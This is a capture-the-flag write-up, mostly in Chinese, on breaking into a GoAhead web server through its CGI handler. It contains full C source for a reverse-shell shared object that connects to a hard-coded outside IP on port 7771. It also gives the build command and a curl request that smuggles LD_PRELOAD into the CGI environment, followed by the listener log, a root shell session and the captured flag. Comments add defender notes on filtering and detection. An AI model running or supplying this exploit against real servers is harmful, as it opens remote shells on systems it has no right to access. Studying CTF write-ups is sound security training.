访问网站之后，从页面源码中看到一个 cgi 链接，点进去发现用的是 GoAhead，所以直接参考泽哥的文章，exp 直接秒掉。
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

/* Callback endpoint the loaded object dials out to; both values are fixed at
 * compile time, so the destination IP:port is a concrete network indicator
 * for anyone reviewing egress logs from the web server host. */
char *server_ip="202.182.115.203";
uint32_t server_port=7771;

/* GCC constructor attribute: the function runs when the shared object is
 * mapped, before any code of the host program. Nothing in the target needs
 * to call it -- merely getting the library loaded (here via LD_PRELOAD in
 * the CGI child's environment) is sufficient. Defender note: a CGI handler
 * must not let request-controlled names such as LD_PRELOAD reach the child
 * environment; allowlist the variables the handler exports. */
static void reverse_shell(void) __attribute__((constructor));

/* On load: open a TCP socket, connect to server_ip:server_port, make the
 * socket the process's stdin/stdout/stderr, then replace the process image
 * with /bin/sh. Observable from the host side as the web server's CGI child
 * exec'ing /bin/sh whose fds 0-2 are a network socket -- a high-signal
 * detection rule for a web server that should never spawn a shell.
 * Note the return value of socket() is never checked, and a failed connect()
 * ends the whole host process with exit(0) at load time. */
static void reverse_shell(void) {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in attacker_addr = {0};
    attacker_addr.sin_family = AF_INET;
    attacker_addr.sin_port = htons(server_port);
    attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
    /* Any connect() failure terminates the hosting process (exit status 0). */
    if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0) exit(0);
    /* Bind the shell's standard streams to the socket. */
    dup2(sock, 0); dup2(sock, 1); dup2(sock, 2);
    /* argv and envp are both NULL; the shell inherits nothing but the fds. */
    execve("/bin/sh", 0, 0);
}
exp的使用
# Build the listing above as a position-independent shared object; its
# constructor runs as soon as the dynamic loader maps the file.
gcc -shared -fPIC ./exp.c -o exp.so
# Defender note: the vulnerable behaviour is the CGI handler exporting
# request parameters (here LD_PRELOAD) into the child process environment
# unfiltered. The upstream fix, as I recall, refuses LD_* names in the CGI
# environment -- confirm against the deployed GoAhead build rather than
# relying on the banner. The request body arrives on the child's stdin, which
# is why /proc/self/fd/0 resolves to the posted file.
curl -X POST --data-binary @exp.so http://183.129.189.62:14000/cgi-bin/index\?LD_PRELOAD\=/proc/self/fd/0
之后在自己的服务器上监听对应端口即可。
root@zerosll:~ Listening on [0.0.0.0] (family 0, port 7771)
Connection from [183.129.189.58] port 7771 [tcp/*] accepted (family 2, sport 54228)
cat /start.sh
#!/bin/sh
echo "$1"; echo "$1" > /home/ctf/flag;
while :
do
/usr/sbin/chroot --userspec 1000:1000 / /home/ctf/goahead -v --home /home/ctf/test /home/ctf/test/web 9999
done
cat /home/ctf/flag
flag{2392862153ef30405ef5c972139102be}